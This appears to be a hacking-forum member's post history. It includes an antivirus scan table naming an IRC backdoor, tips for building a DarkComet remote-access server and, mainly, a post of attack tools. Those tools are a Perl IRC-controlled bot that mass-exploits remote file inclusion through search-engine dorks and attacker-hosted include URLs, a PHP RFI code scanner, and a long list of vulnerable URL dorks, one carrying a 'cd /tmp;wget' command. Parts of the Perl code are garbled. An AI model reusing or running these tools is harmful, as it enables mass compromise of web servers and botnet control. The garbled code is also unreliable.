Jimmy

Active Members
  • Posts: 984
  • Joined
  • Last visited
  • Days Won: 10

Everything posted by Jimmy

  1. Havij 1.15 is out. Official site
  2. Welcome to the jungle.
  3. Antivirus results
     AhnLab-V3 - 2011.06.23.00 - 2011.06.22 - Backdoor/Win32.IRCBot
     AntiVir - 7.11.10.74 - 2011.06.22 - TR/Crypt.NSPM.Gen
     Antiy-AVL - 2.0.3.7 - 2011.06.22 - Backdoor/Win32.IRCBot.gen
     Avast - 4.8.1351.0 - 2011.06.22 - Win32:Malware-gen
     Avast5 - 5.0.677.0 - 2011.06.22 - Win32:Malware-gen
     AVG - 10.0.0.1190 - 2011.06.22 - BackDoor.Ircbot.MGC
     BitDefender - 7.2 - 2011.06.23 - Gen:Trojan.Heur.JP.ni0@a4sgv7ii
     CAT-QuickHeal - 11.00 - 2011.06.22 - Backdoor.IRCBot.oqm
     ClamAV - 0.97.0.0 - 2011.06.22 - -
     Commtouch - 5.3.2.6 - 2011.06.22 - -
     Comodo - 9158 - 2011.06.22 - TrojWare.Win32.Trojan.NSPM.~gen
     eTrust-Vet - 36.1.8401 - 2011.06.22 - -
     F-Prot - 4.6.2.117 - 2011.06.22 - -
     F-Secure - 9.0.16440.0 - 2011.06.22 - Gen:Trojan.Heur.JP.ni0@a4sgv7ii
     Fortinet - 4.2.257.0 - 2011.06.22 - -
     GData - 22 - 2011.06.22 - Gen:Trojan.Heur.JP.ni0@a4sgv7ii
     Ikarus - T3.1.1.104.0 - 2011.06.22 - Trojan-Dropper.Agent
     Jiangmin - 13.0.900 - 2011.06.22 - Backdoor/IRCBot.jzq
     K7AntiVirus - 9.106.4834 - 2011.06.22 - Backdoor
     Kaspersky - 9.0.0.837 - 2011.06.22 - Backdoor.Win32.IRCBot.oqm
     McAfee - 5.400.0.1158 - 2011.06.23 - Artemis!F9A4BEE6474F
     McAfee-GW-Edition - 2010.1D - 2011.06.22 - Heuristic.LooksLike.Win32.Suspicious.C
     Microsoft - 1.7000 - 2011.06.22 - Backdoor:Win32/Ursap!rts
     NOD32 - 6230 - 2011.06.23 - probably a variant of Win32/IRCBot.JTPYUKL
     nProtect - 2011-06-22.02 - 2011.06.22 - -
     Panda - 10.0.3.5 - 2011.06.22 - Trj/CI.A
     PCTools - 8.0.0.5 - 2011.06.22 - Backdoor.Trojan
     Prevx - 3.0 - 2011.06.23 - -
     Rising - 23.63.02.03 - 2011.06.22 - Trojan.Win32.Generic.11F147DD
     Sophos - 4.66.0 - 2011.06.22 - Sus/UnkPacker
     SUPERAntiSpyware - 4.40.0.1006 - 2011.06.22 - -
     TheHacker - 6.7.0.1.237 - 2011.06.22 - -
     TrendMicro - 9.200.0.1012 - 2011.06.22 - TROJ_GEN.R4FE1J3
     TrendMicro-HouseCall - 9.200.0.1012 - 2011.06.23 - TROJ_GEN.R4FE1J3
     VIPRE - 9662 - 2011.06.22 - Trojan.Win32.Generic!BT
     ViRobot - 2011.6.22.4527 - 2011.06.22 - Backdoor.Win32.S.IRCBot.214766
     VirusBuster - 14.0.91.1 - 2011.06.22 - Backdoor.Ursap!AHbYMdMqMwY
  4. it has a TROJAN. Seriously...? Edit: Where did you scan it, since you say it has a trojan?
  5. When you build the server with DarkComet, uncheck the "explorer injection" option and try again...
  6. Download Torrent
  7. Jimmy

    Fun stuff

  8. you got off on the wrong foot...
  9. Perl script: #!/usr/bin/perl # powered by alboss paradise @ # irc.ascnet.biz ; irc.fier1.com ; irc.securityfuckus.com # www.xshqiptaretx.org use IO::Socket::INET; use HTTP::Request; use LWP::UserAgent; #my $processo = "httpd -SascSL"; my $processo = "/usr/local/apache/bin/httpd -SascSL"; if (`ps aux` =~ /httpd -SascSL/){exit;} my $cmd="http://fucku.com/c9???"; my $server="irc.ascnet.biz"; my $porta="6667"; my $nick="[ASC]RFI[".int(rand(1000))."]"; my $canale="#asc"; my $server2="irc.ascnet.biz"; my $port2="6667"; my $verbot="6.9"; $0="$processo"."\0"x16; my $pid=fork; exit if $pid; die "Problem with fork!: $!" unless defined($pid); my $sk = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server", PeerPort=>"$porta",) or die "Cannot connect to server!\n"; $sk->autoflush(1); print $sk "NICK $nick\r\n"; print $sk "USER ASC X * :4,1irc.ascnet.biz : ALBANIAN.SECURITY.CLAN\r\n"; print $sk "JOIN $canale\r\n"; print $sk "PRIVMSG $canale :4 .:: [4,1SHELLS ( RFI ) SCANNER STARTED] 9,1 !!! !rfi IS ON !!!4 ::.\r\n"; print $sk "PRIVMSG $canale :4 .:: 9,1!!! /join #asc FOR !help ON !!!4 ::.\r\n"; while($line = <$sk>){ print $line; $line =~ s/rn$//; if ($line=~ /^PING .*)/){ print "PONG :$1"; print $sk "PONG :$1\r\n";} if ($line =~ /^.+?)!(.+?)@(.+?) PRIVMSG (.+?) 
.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^001VERSION001$/) { stampa($sk, "NOTICE $pn :\001VERSION XChat 2.6.7 by ALBANIA\001");}} if ($line =~ m/^.+?)s+001s+(S+)s/i) { print $sk "JOIN $canale\r\n";} if ($line=~ /PRIVMSG $canale :.help/){ stampa($sk, "PRIVMSG $canale :4 .:: [4,1HELP] 9,1/join #asc FOR !help4 ::.");} if ($line=~ /PRIVMSG $canale :.info/){ my $sysos = `uname -sr`; my $uptime = `uptime`; if ($sysos =~ /freebsd/i ) { $sysname = `hostname`; $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`; $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`; chomp($memory); chomp($swap);} elsif ( $sysos =~ /linux/i ) { $sysname = `hostname -f`; $memory = `free -m |grep -i mem | awk '{print \$2}'`; $swap = `free -m |grep -i swap | awk '{print \$2}'`; chomp($swap); chomp($memory);} else { $sysname ="No Found";; $memory ="No found"; $swap ="No Found";} $uptime=~s/n//g; $sysname=~s/n//g; $sysos=~s/n//g; stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1IrcServer/Port:7,1 $server2 - $port24 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Os/Hostname:7,1 $sysos - $sysname4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Process/PID:7,1 $processo - $$4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Uptime:7,1 $uptime4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Memory/Swap:7,1 $memory - $swap4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Info] 9,1Perl/Bot Version:7,1 $] - $verbot4 ::.");} if ($line=~ /PRIVMSG $canale :.rfis+(.*?)s+(.*)/){ if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $bug=$1; my $dork=$2; if ($bug =~ /=/) {} else { stampa($sk, "PRIVMSG $canale :4 .:: [4,1GAY/LAMMER/NOOB/BIBA] 9,1DETECTED, U AREN'T ALOWEED TO SCANN ANYMORE OK !!! 
cuz u don't know...4 ::.");exit;} my $contatore=0; my ($type,$space); my %hosts; stampa($sk, "PRIVMSG $canale :4 .:: [4,1String(s)] 7,1$dork4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Path] 7,1$bug4 ::."); my @glist=&google($dork); my @mlist=&msn($dork); my @alist=&altavista($dork); my @uollist=&uol($dork); my @asklist=&ask($dork); my @ylist=&yahoo($dork); my @altlist=&alltheweb($dork); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1Ok founds sites for [4,1String(s)] 7,1$dork4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1Google ".scalar(@glist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1MsN ".scalar(@mlist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1Altavista ".scalar(@alist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1AllTheWeb ".scalar(@altlist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1UoL ".scalar(@uollist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1Yahoo ".scalar(@ylist)." Sites!4 ::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 9,1AsK ".scalar(@asklist)." Sites!4 ::."); push(my @tot,@glist,@mlist,@uollist,@aollist,@asklist,@altlist,@ylist); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 7,1We got a totales of ".scalar(@tot)." Sites!4 ::."); my @puliti=&unici(@tot); stampa($sk, "PRIVMSG $canale :4 .:: [4,1Searchers] 7,1Cleaned Websites Founds ".scalar(@puliti)." Sites!4 ::."); my $uni=scalar(@puliti); foreach my $sito (@puliti){ $contatore++; if ($contatore %100==0){} if ($contatore==$uni-1){ stampa($sk, "PRIVMSG $canale :4 .:: [4,1.. #asc rfi scanner...] 
9,1Scann Finished For [4String(s)] 7,1$dork4 ::."); stampa($sk, "PRIVMSG $canale : 4,1POWERED BY ALBOSS PARADISE @ (> IRC.ASCNET.BIZ <)");} my $test="http://".$sito.$bug.$cmd."????"; my $print="http://".$sito.$bug."http://ascnet.extra.hu/c9"."????"; my $req=HTTP::Request->new(GET=>$test); my $ua=LWP::UserAgent->new(); $ua->timeout(5); my $response=$ua->request($req); if ($response->is_success) { my $re=$response->content; if($re =~ /ALBANIA/ && $re =~ /uid=/){ #my $punked="http://www.xshqiptaretx.org/list/index.php?off=$test"; #my $poster=HTTP::Request->new(GET=>$punked); #my $resa=$ua->request($poster); my $hs=geths($print); $hosts{$hs}++; if($hosts{$hs}=="1"){ $x=os($test); stampa($sk, "PRIVMSG $canale :4 .:: [4,1SafeMode] (3 OFF ) $print 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1uname -a] (3$alb ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1uptime] (3$alb2 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1id] (3$alb3 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1pwd] (3$alb4 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1user] (3$alb9 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1phpv] (3$alb6 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1SoftWare] (3$alb5 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1ServerAddr] (3$alb7 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1ServerName] (3$alb8 ) 4::.");}} elsif($re =~ /ALBANIA/){ #my $punked1="http://www.xshqiptaretx.org/list/index.php?on=$test"; #my $poster1=HTTP::Request->new(GET=>$punked1); #my $resa=$ua->request($poster1); my $hs=geths($print); $hosts{$hs}++; if($hosts{$hs}=="1"){ $x=os($test); stampa($sk, "PRIVMSG $canale :4 .:: [4,1SafeMode] (4 ON ) $print 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1uname -a] (4$alb ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1uptime] (4$alb2 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1id] (4$alb3 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1pwd] (4$alb4 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1user] (4$alb9 ) 4::."); 
stampa($sk, "PRIVMSG $canale :4 .:: [4,1phpv] (4$alb6 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1SoftWare] (4$alb5 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1ServerAddr] (4$alb7 ) 4::."); stampa($sk, "PRIVMSG $canale :4 .:: [4,1ServerName] (4$alb8 ) 4::."); }}}}}exit;}}} sub stampa() { if ($#_ == '1') { my $sk = $_[0]; print $sk "$_[1]\n"; } else { print $sk "$_[0]\n";}} sub os(){ my $sito=$_[0]; my $Res=query($sito); while($Res=~m/<br>uname -a:(.+?)<br>/g){ $alb=$1;} while($Res=~m/<br>uptime:(.+?)<br>/g){ $alb2=$1;} while($Res=~m/<br>id:(.+?)<br>/g){ $alb3=$1;} while($Res=~m/<br>pwd:(.+?)<br>/g){ $alb4=$1;} while($Res=~m/<br>user:(.+?)<br>/g){ $alb9=$1;} while($Res=~m/<br>phpv:(.+?)<br>/g){ $alb6=$1;} while($Res=~m/<br>SoftWare:(.+?)<br>/g){ $alb5=$1;} while($Res=~m/<br>ServerAddr:(.+?)<br>/g){ $alb7=$1;} while($Res=~m/<br>ServerName:(.+?)<br>/g){ $alb8=$1;} sub google(){ my @lst; my $key = $_[0]; for($b=0;$b<=2000;$b+=100){ my $Go=("http://www.google.co.uk/search?hl=en&q=".key($key)."&btnG=&meta=&num=100&filter=0&start=".$; my $Res=query($Go); while($Res =~ m/<a href="?http:\/\/([^>\"]*)\//g){ if ($1 !~ /google/){ my $k=$1; my @grep=links($k); push(@lst,@grep);}}} return @lst;} sub altavista(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$; my $Res=query($AlT); while($Res=~m/<span class=ngrn>(.+?)//g){ if($1 !~ /altavista/){ my $k=$1; $k=~s/<//g; $k=~s/ //g; my @grep=links($k); push(@lst,@grep);}} if ($Res =~ /target="_self\">Succ/){} else{return @lst;}} return @lst;} sub yahoo(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$; my $Res=query($Ya); while($Res =~ m/**http%3a//(.+?)" >/g){ my $k=$1; $k=~s/<b>//g; $k=~s/<\/b>//g; $k=~s/<wbr>//g; my @grep=links($k); push(@lst,@grep);}} return @lst;} sub alltheweb(){ my @lst; my $key=$_[0]; my $i=0; my $pg=0; 
for($i=0; $i<=2000;$i+=100){ my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); my $Res=query($all); while($Res =~ m/<span class="?resURL\"?>http:\/\/(.+?)\<\/span>/g){ my $k=$1; $k=~s/ //g; my @grep=links($k); push(@lst,@grep);}} return @lst;} sub lycos(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $LyCoS=("http://search.lycos.com/?query=".key($key)."&page=".$i); my $Res=query($LyCoS); while ($Res=~ m/<span class="?grnLnk small\"?>http:\/\/(.+?)\//g ){ my $k=$1; if($k!~/busca|lycos|yahoo/){ my $k=$1; my @grep=links($k); push(@lst,@grep);}}} return @lst;} sub msn(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); my $Res=query($MsN); while($Res =~ m/<a href="?http:\/\/([^>\"]*)\//g){ if($1 !~ /msn|live/){ my $k=$1; my @grep=links($k); push(@lst,@grep);}} if ($Res =~ /nextPage disabled/) {return @lst;}} return @lst;} sub ask(){ my @lst; my $key=$_[0]; my $i=0; my $pg=0; for($i=0; $i<=2000;$i+=100){ my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all"); my $Res=query($Ask); while($Res=~m/<a id="(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){ my $k=$3; $k=~s/[\"\ ]//g; my @grep=links($k); push(@lst,@grep);}} return @lst;} sub uol(){ my @lst; my $key = $_[0]; for($b=1;$b<=2000;$b+=100){ my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i); my $Res=query($UoL); while($Res =~ m/<a href="http:\/\/([^>\"]*)/g){ my $k=$1; if($k!~/busca|uol|yahoo/){ my $k=$1; my @grep=links($k); push(@lst,@grep);}}} return @lst;} sub links(){ my @l; my $link=$_[0]; my $host=$_[0]; my $hdir=$_[0]; $hdir=~s/(.*)\/[^\/]*$/\1/; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host.="/"; $link.="/"; $hdir.="/"; $host=~s/\/\//\//g; $hdir=~s/\/\//\//g; $link=~s/\/\//\//g; push(@l,$link,$host,$hdir); return @l;} sub geths(){ my $host=$_[0]; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; return $host;} sub 
key(){ my $chiave=$_[0]; $chiave =~ s/ /\+/g; $chiave =~ s/:/\%3A/g; $chiave =~ s/\//\%2F/g; $chiave =~ s/&/\%26/g; $chiave =~ s/\"/\%22/g; $chiave =~ s/,/\%2C/g; $chiave =~ s/\\/\%5C/g; return $chiave;} sub query($){ my $url=$_[0]; $url=~s/http:\/\///; my $host=$url; my $query=$url; my $page=""; $host=~s/href=\"?http:\/\///; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query=~s/$host//; if ($query eq "") {$query="/";}; eval{ my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0rnHost: $hostrnAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page="@r"; close($sock);}; return $page;} sub unici{ my @unici = (); my %visti = (); foreach my $elemento ( @_ ){ next if $visti{ $elemento }++; push @unici, $elemento;} return @unici;}} # powered by alboss paradise @ # irc.ascnet.biz ; irc.fier1.com ; irc.securityfuckus.com # www.xshqiptaretx.org

Php script:

<?php
/***************************************************************************
 *   PHP Evil RFI Scanner v1.2
 *
 *   Copyright (C) 2007 by evilsocket
 *
 *   http://www.evilsocket.net
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 *   This program is distributed in the hope that it will be useful,
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 *   GNU General Public License for more details.
 *
 *   You should have received a copy of the GNU General Public License
 *   along with this program; if not, write to the
 *   Free Software Foundation, Inc.,
 *   59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 ***************************************************************************/

/* regexes that locate include/require statements whose argument is a variable */
$escan_inc_regex = array( '/include(_once)?.\$/ix',
                          '/require(_once)?.\$/ix' );
/* regexes used to extract the variable name */
$escan_var_regex = array( '/\Ainclude(_once)?./is',
                          '/\Arequire(_once)?./is' );
/* extensions of the files to scan */
$escan_valid_ext = array( 'php' );
/* maximum size of a file to scan; 0 scans every file */
$escan_max_size = 0;
/* counter of scanned directories */
$escan_dir_count = 0;
/* counter of scanned files */
$escan_file_count = 0;
/* counter of potential RFIs found */
$escan_match_count = 0;
/* counter of total bytes scanned */
$escan_byte_count = 0;

escan_banner();

if( $argc < 2 ){
    escan_usage($argv[0]);
}
else{
    $stime = escan_get_mtime();
    escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR );
    $etime = escan_get_mtime();

    print "\n@ Scan report : \n\n" .
          "\t$escan_dir_count directory .\n".
          "\t$escan_file_count file .\n".
          "\t" . escan_format_size($escan_byte_count) . " .\n".
          "\t$escan_match_count potenziali RFI .\n".
          "\t".($etime-$stime) . " secondi di elaborazione .\n\n";
}

/* formats a size given in bytes as a string */
function escan_format_size($bytes)
{
    if( $bytes < 1024 )       return "$bytes bytes";
    if( $bytes < 1048576 )    return ($bytes / 1024) . " Kb";
    if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";

    return ($bytes / 1073741824) . " Gb";
}

/* returns the current timestamp in seconds */
function escan_get_mtime()
{
    list($usec, $sec) = explode(" ",microtime());
    return ((float)$usec + (float)$sec);
}

/* extracts the line of code containing the inclusion (up to the next ';') */
function escan_scan_line($content,$offset)
{
    /* limit of 2 keeps this safe when no ';' follows the match */
    $parts = explode( ";", substr($content,$offset), 2 );
    return $parts[0].";";
}

/* extracts the variable name from the line of code containing the inclusion */
function escan_parse_var( $line, $regex_id )
{
    global $escan_var_regex;

    $vars       = preg_split($escan_var_regex[$regex_id],$line);
    $varname    = isset($vars[1]) ? $vars[1] : "";
    $delimiters = " .);";

    for( $i = 0; $i < strlen($varname); $i++ ){
        for( $j = 0; $j < strlen($delimiters); $j++ ){
            if( $varname[$i] == $delimiters[$j] ){
                return substr( $varname, 0, $i );
            }
        }
    }

    return $varname;
}

/* checks whether variable $var is defined in $content before position $offset */
function escan_check_definitions($content,$offset,$var)
{
    /* object members ($obj->prop) are treated as defined */
    if( strpos( $var, "->" ) ){
        return 1;
    }

    $chunk = substr($content,0,$offset);
    $regex = "/".preg_quote($var,"/")."\s*=/ix";
    preg_match( $regex, $chunk, $matches );

    return count($matches);
}

/* parses file $file looking for potential RFIs */
function escan_parse_file($file)
{
    global $escan_inc_regex;
    global $escan_max_size;
    global $escan_file_count;
    global $escan_match_count;
    global $escan_byte_count;

    $fsize = filesize($file);

    if( $escan_max_size && $fsize > $escan_max_size ) return;

    $escan_file_count++;
    $escan_byte_count += $fsize;

    $content = @file_get_contents($file);

    for( $i = 0; $i < count($escan_inc_regex); $i++ ){
        if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PREG_OFFSET_CAPTURE ) ){
            $nmatch = count($matches[0]);
            for( $j = 0; $j < $nmatch; $j++ ){
                $offset = $matches[0][$j][1];
                $line   = escan_scan_line($content,$offset);
                $var    = escan_parse_var($line,$i);

                /* report only variables never assigned before the inclusion */
                if( escan_check_definitions($content,$offset,$var) == 0 ){
                    $escan_match_count++;
                    print "@ $file - \n\t- '$var' alla posizione $offset .\n";
                }
            }
        }
    }
}

/* returns the extension of file $fname */
function escan_get_file_ext($fname)
{
    if( strchr($fname,'.') ){
        return substr($fname,strrpos($fname,'.')+1);
    }
    else{
        return "";
    }
}

/* checks whether file $fname has a valid extension */
function escan_isvalid_ext($fname)
{
    global $escan_valid_ext;

    for( $i = 0; $i < count($escan_valid_ext); $i++ ){
        if( strstr(escan_get_file_ext($fname),$escan_valid_ext[$i]) ){
            return true;
        }
    }

    return false;
}

/* recursively scans the directories */
function escan_recurse_dir($dir)
{
    global $escan_dir_count;

    $escan_dir_count++;

    if( $cdir = @dir($dir) ){
        /* strict comparison so an entry named "0" does not end the loop */
        while( false !== ($entry = $cdir->read()) ){
            if( $entry != '.' && $entry != '..' ){
                if( is_dir($dir.$entry) ){
                    escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR);
                }
                else{
                    if( escan_isvalid_ext($dir.$entry) ){
                        escan_parse_file($dir.$entry);
                    }
                }
            }
        }
        $cdir->close();
    }
}

function escan_banner()
{
    print "*-----------------------------------------------*\n" .
          "* PHP Evil RFI Scanner v1.2 by evilsocket *\n" .
          "* *\n" .
          "* http://www.evilsocket.net *\n" .
          "*-----------------------------------------------*\n\n";
}

function escan_usage($pname)
{
    print "Uso : php $pname <dir>\n";
}
?>

Dorks RFI
cmd/product_info.php/products_id/1622/shop_content.php?coID= addevent.inc.php?agendax_path= step_one.php?server_inc= upgrade_album.php?GALLERY_BASEDIR= search.php?cutepath= modules.php?name= wagora/extras//quicklist.php?site= vCard/admin/define.inc.php?match= forum/ubbthreads.php?Cat= admin/includes/classes/spaw/spaw_control.class.php?spaw_root= secure.php?cfgProgDir= modules/My_eGallery/public//inc/?HCL_path= modules/My_eGallery/public/imagen.php?basepath= adlayer.php?layerstyle= Forums/bb_smilies.php?name= modules/Forums/bb_smilies.php?name= gadgets/Blog/BlogModel.php?path= learnlinc/clmcpreload.php?CLPATH= modernbill/samples/news.php?DIR= religions/faq.php?page= forum/viewtopic.php?t= announcements.php?includePath= inc/header.php/step_one.php?server_inc= phpatm/index.php?include_location= gb/form.inc.php3?lang= shannen/index.php?x= family/phpgedview/index.php?PGV_BASE_DIRECTORY= main.php?left= forum/misc.php?action= nucleus/libs/globalfunctions.php?DIR_LIBS= show_archives.php?cutepath= gallery.php= magicforum/misc.php?action= forum/admin/actions/del.php?include_path= index.php?meio= local/investing_industrialeastate1.php?a= modules/coppermine/themes/default/theme.php?THEME_DIR Popper/index.php?childwindow.inc.php?form= class.mysql.php?path_to_bt_dir= include/footer.inc.php?_AMLconfig[cfg_serverpath]= eyeos/desktop.php?baccio= ashnews.php?pathtoashnews= index.php?modpath= becommunity/community/index.php?pageurl= index.php?sqld= modules/module_db.php?pivot_path= catalog/includes/include_once.php?include_file= cgi-bin/calendar.pl?fromTemplate= live/inc/pipe.php?HCL_path= zb41/include/write.php?dir= cgi-bin/awstats.pl?logfile= presse/stampa.php3?azione= inc/step_one_tables.php?server_inc= index.php?mainpage= phpprojekt/lib/authform.inc.php?path_pre= captionator.php?GALLERY_BASEDIR= _head.php?_zb_path=.example.com achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot= gallery/captionator.php?GALLERY_BASEDIR=.example.com 
globals.php3?LangCookie=.example.com include/msql.php?inc_dir= include/mssql7.php?inc_dir= include/mysql.php?inc_dir= include/oci8.php?inc_dir= include/postgres.php?inc_dir= include/postgres65.php?inc_dir= install.php?phpbb_root_dir= mantis/login_page.php?g_meta_inc_dir= page.php?template= phorum/admin/actions/del.php?include_path= pollensondage.inc.php?app_path= user/agora_user.php?inc_dir= user/ldap_example.php?inc_dir= userlist.php?ME=.example.com _functions.php?prefix= cpcommerce/_functions.php?prefix= ashnews.php?pathtoashnews=cd /tmp;wget eblog/blog.inc.php?xoopsConfig[xoops_url]= b2-tools/gm-2-b2.php?b2inc= includes/include_once.php?include_file= modules.php?name=jokeid= index.php?site= livehelp/inc/pipe.php?HCL_path= hcl/inc/pipe.php?HCL_path= support/faq/inc/pipe.php?HCL_path= help/faq/inc/pipe.php?HCL_path= helpcenter/inc/pipe.php?HCL_path= live-support/inc/pipe.php?HCL_path= gnu3/index.php?doc= gnu/index.php?doc= phpgwapi/setup/tables_update.inc.php?appdir= includes/calendar.php?phpc_root_path= includes/setup.php?phpc_root_path= inc/authform.inc.php?path_pre= include/authform.inc.php?path_pre= web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR= web_statistics//tools/send_reminders.php?includedir= web_statistics//include/write.php?dir= web_statistics//modules/My_eGallery/public/displayCategory.php?basepath= web_statistics//calendar/tools/send_reminders.php?includedir= web_statistics//skin/zero_vote/error.php?dir= web_statistics//coppercop/theme.php?THEME_DIR= includes/header.php?systempath= Gallery/displayCategory.php?basepath= index.inc.php?PATH_Includes= nphp/nphpd.php?nphp_config[LangFile]= ashheadlines.php?pathtoashnews= demo/includes/init.php?user_inc= jaf/index.php?show= inc/shows.inc.php?cutepath= poll/admin/common.inc.php?base_path= sources/post.php?fil_config= bb_lib/checkdb.inc.php?libpach= include/livre_include.php?chem_absolu= index.php?pageurl= derniers_commentaires.php?rep= 
modules/coppermine/themes/default/theme.php?THEME_DIR= coppermine/themes/maze/theme.php?THEME_DIR= allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]= allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]= agendax/addevent.inc.php?agendax_path= main.php?page= default.php?page= index.php?action= index1.php?p= index2.php?x= index2.php?content= index.php?conteudo= GradeMap/index.php?page= phpopenchat/contrib/yabbse/poc.php?sourcedir= calendar/calendar.php?serverPath= calendar/functions/popup.php?serverPath= calendar/events/header.inc.php?serverPath= calendar/events/datePicker.php?serverPath= calendar/setup/setupSQL.php?serverPath= calendar/setup/header.inc.php?serverPath= install/index.php?G_PATH= support/mailling/maillist/inc/initdb.php?absolute_path= coppercop/theme.php?THEME_DIR= dotproject/modules/projects/addedit.php?root_dir= dotproject/modules/projects/view.php?root_dir= dotproject/modules/projects/vw_files.php?root_dir= dotproject/modules/tasks/addedit.php?root_dir= dotproject/modules/tasks/viewgantt.php?root_dir= My_eGallery/public/displayCategory.php?basepath= index.php?meio.php= index.php?configFile= index.php?do= phpshop/index.php?base_dir= contacts.php?cal_dir= convert-date.php?cal_dir= album_portal.php?phpbb_root_path= mainfile.php?MAIN_PATH= html/affich.php?base= gallery/init.php?HTTP_POST_VARS= ideabox/include.php?gorumDir= stats/modules/My_eGallery/index.php?basepath= stats/include/write.php?dir= stats/tools/send_reminders.php?includedir= index.cgiupgrade_album.php?GALLERY_BASEDIR= pollvote/pollvote.php?pollname includes/page_header.php?dir= index2.php?mosConfig_absolute_path= new/bbs//include/write.php?dir= index.php?mosConfig_absolute_path= modules/My_eGallery/public/inc/?HCL_path= /forum/auth/auth.php?phpbb_root_path= /forum/auth/auth_phpbb/phpbb_root_path= /cutenews/comments.php?cutepath= /library/lib.php?root= /impex/ImpExData.php?systempath= /coppermine/thumbnails.php?lang= /gallery/thumbnails.php?lang= 
/aWebNews/visview.php?path_to_news= /ashnews.php?pathtoashnews= /4images/index.php?template= /galeri/index.php?template= /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= /components/com_smf/smf.php?mosConfig_absolute_path= /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= /components/com_simpleboard/image_upload.php?sbp= /gallery/index.php?template= /auth/auth.php?phpbb_root_path= /auth/auth_phpbb/phpbb_root_path= /modules/Forums/admin/index.php?phpbb_root_path= /modules/Forums/admin/admin_avatar.php?phpbb_root_path= /modules/Forums/admin/admin_styles.php?phpbb_root_path= /_wk/wk_lang.php?wkPath= /shoutbox/expanded.php?conf= /myPHPCalendar/admin.php?cal_dir= /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= 